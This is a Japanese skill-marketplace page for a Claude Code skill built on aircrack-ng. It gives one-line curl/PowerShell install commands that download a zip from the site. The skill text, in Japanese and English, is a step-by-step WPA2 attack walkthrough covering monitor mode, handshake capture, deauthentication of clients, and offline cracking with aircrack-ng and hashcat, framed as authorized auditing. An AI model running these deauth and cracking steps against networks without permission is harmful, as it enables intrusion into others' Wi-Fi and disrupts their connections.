jpskill.com
🛠️ 開発・MCP コミュニティ

aircrack-ng

許可を得たWi-Fiネットワークのセキュリティを、aircrack-ngというツールを使って診断し、WPA2のハンドシェイクを解析したり、無線アダプタを監視モードにしたりするなど、無線ネットワークの侵入テストを支援するSkill。

📜 元の英語説明(参考)

Audit Wi-Fi networks with the aircrack-ng suite. Use when a user asks to test their own wireless network, capture WPA2 handshakes, crack captured handshakes offline, put an adapter into monitor mode, or perform a wireless pentest under an authorized engagement.

🇯🇵 日本人クリエイター向け解説

一言でいうと

許可を得たWi-Fiネットワークのセキュリティを、aircrack-ngというツールを使って診断し、WPA2のハンドシェイクを解析したり、無線アダプタを監視モードにしたりするなど、無線ネットワークの侵入テストを支援するSkill。

※ jpskill.com 編集部が日本のビジネス現場向けに補足した解説です。Skill本体の挙動とは独立した参考情報です。

⚡ おすすめ: コマンド1行でインストール(60秒)

下記のコマンドをコピーしてターミナル(Mac/Linux)または PowerShell(Windows)に貼り付けてください。 ダウンロード → 解凍 → 配置まで全自動。

🍎 Mac / 🐧 Linux
mkdir -p ~/.claude/skills && cd ~/.claude/skills && curl -L -o aircrack-ng.zip https://jpskill.com/download/14620.zip && unzip -o aircrack-ng.zip && rm aircrack-ng.zip
🪟 Windows (PowerShell)
$d = "$env:USERPROFILE\.claude\skills"; ni -Force -ItemType Directory $d | Out-Null; iwr https://jpskill.com/download/14620.zip -OutFile "$d\aircrack-ng.zip"; Expand-Archive "$d\aircrack-ng.zip" -DestinationPath $d -Force; ri "$d\aircrack-ng.zip"

完了後、Claude Code を再起動 → 普通に「動画プロンプト作って」のように話しかけるだけで自動発動します。

💾 手動でダウンロードしたい(コマンドが難しい人向け)
  1. 1. 下の青いボタンを押して aircrack-ng.zip をダウンロード
  2. 2. ZIPファイルをダブルクリックで解凍 → aircrack-ng フォルダができる
  3. 3. そのフォルダを C:\Users\あなたの名前\.claude\skills\(Win)または ~/.claude/skills/(Mac)へ移動
  4. 4. Claude Code を再起動

⚠️ ダウンロード・利用は自己責任でお願いします。当サイトは内容・動作・安全性について責任を負いません。

🎯 このSkillでできること

下記の説明文を読むと、このSkillがあなたに何をしてくれるかが分かります。Claudeにこの分野の依頼をすると、自動で発動します。

📦 インストール方法 (3ステップ)

  1. 1. 上の「ダウンロード」ボタンを押して .skill ファイルを取得
  2. 2. ファイル名の拡張子を .skill から .zip に変えて展開(macは自動展開可)
  3. 3. 展開してできたフォルダを、ホームフォルダの .claude/skills/ に置く
    • · macOS / Linux: ~/.claude/skills/
    • · Windows: %USERPROFILE%\.claude\skills\

Claude Code を再起動すれば完了。「このSkillを使って…」と話しかけなくても、関連する依頼で自動的に呼び出されます。

詳しい使い方ガイドを見る →
最終更新
2026-05-18
取得日時
2026-05-18
同梱ファイル
1

📖 Skill本文(日本語訳)

※ 原文(英語/中国語)を Gemini で日本語化したものです。Claude 自身は原文を読みます。誤訳がある場合は原文をご確認ください。

Aircrack-ng

概要

Aircrack-ng は、802.11 セキュリティ監査のためのリファレンススイートです。モニターモードで無線フレームをキャプチャし、WPA/WPA2 4-way handshake を抽出し、キャプチャされた handshake に対してオフライン辞書攻撃を実行します。このスイートは、airmon-ng (モニターモード)、airodump-ng (キャプチャ)、aireplay-ng (インジェクション/deauth)、および aircrack-ng (オフラインクラック) で構成されています。所有しているネットワーク、または監査の書面による許可を得ているネットワークでのみ使用してください。

手順

ステップ 1: アダプターをモニターモードにする

# どのadapterがモニターモードとinjectionをサポートしているか確認する
sudo airmon-ng
# PHY     Interface       Driver          Chipset
# phy0    wlan0           ath9k_htc       Atheros AR9271

# モニターモードを妨げるプロセスを停止する
sudo airmon-ng check kill

# モニターモードを有効にする — wlan0 が wlan0mon になる
sudo airmon-ng start wlan0

# 確認
iw dev wlan0mon info | grep type
# type monitor

ステップ 2: 周囲のネットワークをスキャンする

# すべての 2.4 および 5 GHz チャネルをスキャンする
sudo airodump-ng wlan0mon
# Columns: BSSID, PWR, Beacons, #Data, CH, ENC, CIPHER, AUTH, ESSID
# ターゲットネットワークの BSSID とチャネルをメモする

# 特定のチャネルと BSSID に絞り込む
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# -w handshake: "handshake" というプレフィックスの pcap ファイルを書き込む
# これを実行し続ける — AP に接続しているクライアントを記録する

ステップ 3: WPA Handshake をキャプチャする

# オプション A: 受動的 — クライアントが認証されるのを待つ
# キャプチャされると、airodump は右上隅に "WPA handshake: AA:BB:CC:DD:EE:FF" と表示する

# オプション B: 能動的 — 既存のクライアントを deauth して再接続を強制する
# (所有しているネットワーク、または許可を得ているネットワークでのみ)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -a: AP BSSID   -c: クライアント MAC (airodump ステーションリストから)
# 5 つの deauth パケットで通常は十分。フラッドしないこと。

# handshake がキャプチャに含まれていることを確認する
aircrack-ng handshake-01.cap
# ターゲット BSSID の横に "1 handshake" があるか確認する

ステップ 4: Handshake をオフラインでクラックする

# rockyou を使用した辞書攻撃
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
# KEY FOUND! [ correcthorsebattery ]

# (john 経由で) ルール変換されたワードリストを使用する
john --wordlist=rockyou.txt --rules=KoreLogic --stdout \
  | aircrack-ng -w - -b AA:BB:CC:DD:EE:FF handshake-01.cap

# GPU クラッキング用に hashcat 形式に変換する (はるかに高速)
hcxpcapngtool -o hash.hc22000 handshake-01.cap
hashcat -m 22000 hash.hc22000 rockyou.txt

ステップ 5: クリーンアップ

# モニターモードを停止し、マネージドモードに戻す
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
iw dev
# wlan0 がマネージドモードに戻っているはず

例 1: 自分のホームネットワークを監査する

# 許可: 自分のネットワークであること。それでも、復旧できるように設定のスナップショットを撮っておくこと。

sudo airmon-ng check kill
sudo airmon-ng start wlan0

# AP を特定する
sudo airodump-ng wlan0mon
# SSID が、たとえばチャネル 6、BSSID CC:... で表示されたら Ctrl+C を押す

# ターゲットを絞ってキャプチャする
mkdir -p ~/audit && cd ~/audit
sudo airodump-ng -c 6 --bssid CC:CC:CC:CC:CC:CC -w home wlan0mon &

# デバイスを再接続する (スマートフォンの Wi-Fi をオフ/オンにする) ことで、handshake を自然に生成する
# ヘッダーに "WPA handshake" が表示されたら airodump を停止する

# 個人のワードリスト + rockyou でクラックを試みる
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b CC:CC:CC:CC:CC:CC home-01.cap

# すぐにクラックできた場合 → パスフレーズが脆弱なので、変更する。
sudo airmon-ng stop wlan0mon

例 2: Hashcat を使用した GPU 高速化クラッキング

# キャプチャを hashcat 22000 形式に変換する (古い -m 2500 を置き換える)
sudo apt install hcxtools
hcxpcapngtool -o corporate.hc22000 corporate-01.cap

# essid/mac を確認する
cat corporate.hc22000 | head

# 強力なワードリスト + best64 ルールで hashcat を実行する
hashcat -m 22000 corporate.hc22000 \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  --status --status-timer=10

# 回復されたパスフレーズを取得する
hashcat -m 22000 corporate.hc22000 --show

ガイドライン

  • 書面による許可が必須です。 近隣の Wi-Fi をキャプチャまたはクラックすることは犯罪です。自分のネットワーク、または契約範囲に含まれるネットワークのみを監査してください。
  • すべての adapter がモニターモードと injection をサポートしているわけではありません。実績のあるチップセット: Atheros AR9271、Ralink RT3070、MediaTek MT7612U、Realtek RTL8812AU。
  • airmon-ng check kill から始めてください。そうしないと、NetworkManager がインターフェースの制御を奪おうとします。
  • Deauth 攻撃はノイズが多く、破壊的です — 最小限の回数 (--deauth 3-5) を使用し、ブロードキャストアドレスではなく、単一のクライアントをターゲットにしてください。
  • オフラインクラッキングに必要なのは WPA 4-way handshake のみです。キャプチャが長すぎるとディスク容量を無駄にします。
  • 最新のネットワークでは、キャプチャを .hc22000 に変換し、hashcat で GPU 上でクラックしてください — CPU aircrack-ng は桁違いに遅いです。
  • WPA3 SAE は従来のオフライン handshake 攻撃に対して脆弱ではありません。aircrack-ng は WPA/WPA2-PSK 用です。
  • エンゲージメントの後はモニターモードを解除して、ホストが日常的な使用でフレームをリークしないようにしてください。
📜 原文 SKILL.md(Claudeが読む英語/中国語)を展開

Aircrack-ng

Overview

Aircrack-ng is the reference suite for 802.11 security auditing. It captures wireless frames in monitor mode, extracts WPA/WPA2 4-way handshakes, and performs offline dictionary attacks against the captured handshake. The suite is airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (injection/deauth), and aircrack-ng (offline crack). Use exclusively on networks you own or have written permission to audit.

Instructions

Step 1: Put the Adapter in Monitor Mode

# Check which adapters support monitor mode and injection
sudo airmon-ng
# PHY     Interface       Driver          Chipset
# phy0    wlan0           ath9k_htc       Atheros AR9271

# Kill processes that interfere with monitor mode
sudo airmon-ng check kill

# Enable monitor mode — wlan0 becomes wlan0mon
sudo airmon-ng start wlan0

# Verify
iw dev wlan0mon info | grep type
# type monitor

Step 2: Scan Nearby Networks

# Scan all 2.4 and 5 GHz channels
sudo airodump-ng wlan0mon
# Columns: BSSID, PWR, Beacons, #Data, CH, ENC, CIPHER, AUTH, ESSID
# Note the BSSID and channel of your target network

# Filter to a specific channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# -w handshake: write pcap files prefixed "handshake"
# Keep this running — it logs clients connecting to the AP

Step 3: Capture a WPA Handshake

# Option A: passive — wait for a client to authenticate
# airodump shows "WPA handshake: AA:BB:CC:DD:EE:FF" in the top-right when captured

# Option B: active — deauth an existing client to force reconnection
# (only on networks you own or have authorization for)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -a: AP BSSID   -c: client MAC (from airodump station list)
# 5 deauth packets is usually enough; don't flood.

# Confirm the handshake is in the capture
aircrack-ng handshake-01.cap
# Look for: "1 handshake" next to the target BSSID

Step 4: Crack the Handshake Offline

# Dictionary attack with rockyou
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
# KEY FOUND! [ correcthorsebattery ]

# With a rule-transformed wordlist (via john)
john --wordlist=rockyou.txt --rules=KoreLogic --stdout \
  | aircrack-ng -w - -b AA:BB:CC:DD:EE:FF handshake-01.cap

# Convert to hashcat format for GPU cracking (much faster)
hcxpcapngtool -o hash.hc22000 handshake-01.cap
hashcat -m 22000 hash.hc22000 rockyou.txt

Step 5: Clean Up

# Stop monitor mode and restore managed mode
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
iw dev
# Should show wlan0 back in managed mode

Examples

Example 1: Audit Your Own Home Network

# Authorization: it's your network. Still, snapshot settings so you can recover.

sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Locate your AP
sudo airodump-ng wlan0mon
# Press Ctrl+C after you see your SSID on, say, channel 6, BSSID CC:... 

# Capture targeted
mkdir -p ~/audit && cd ~/audit
sudo airodump-ng -c 6 --bssid CC:CC:CC:CC:CC:CC -w home wlan0mon &

# Reconnect a device (phone Wi-Fi off/on) to produce the handshake naturally
# Stop airodump once you see "WPA handshake" in the header

# Attempt to crack with a personal wordlist + rockyou
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b CC:CC:CC:CC:CC:CC home-01.cap

# If it cracks quickly → your passphrase is weak, change it.
sudo airmon-ng stop wlan0mon

Example 2: GPU-Accelerated Cracking with Hashcat

# Convert the capture to hashcat 22000 format (replaces older -m 2500)
sudo apt install hcxtools
hcxpcapngtool -o corporate.hc22000 corporate-01.cap

# Verify the essid/mac
cat corporate.hc22000 | head

# Run hashcat with a strong wordlist + best64 rules
hashcat -m 22000 corporate.hc22000 \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  --status --status-timer=10

# Retrieve the recovered passphrase
hashcat -m 22000 corporate.hc22000 --show

Guidelines

  • Written authorization is mandatory. Capturing or cracking a neighbor's Wi-Fi is a crime. Only audit your own networks or those covered by an engagement scope.
  • Not every adapter supports monitor mode and injection. Proven chipsets: Atheros AR9271, Ralink RT3070, MediaTek MT7612U, Realtek RTL8812AU.
  • Start with airmon-ng check kill. NetworkManager will otherwise fight you for control of the interface.
  • Deauth attacks are noisy and disruptive — use the minimum count (--deauth 3-5) and target a single client, never the broadcast address.
  • Only the WPA 4-way handshake is required for offline cracking; longer captures waste disk space.
  • For modern networks, convert the capture to .hc22000 and crack on a GPU with hashcat — CPU aircrack-ng is an order of magnitude slower.
  • WPA3 SAE is not vulnerable to the classic offline handshake attack; aircrack-ng is for WPA/WPA2-PSK.
  • Tear down monitor mode after the engagement so the host doesn't leak frames in routine use.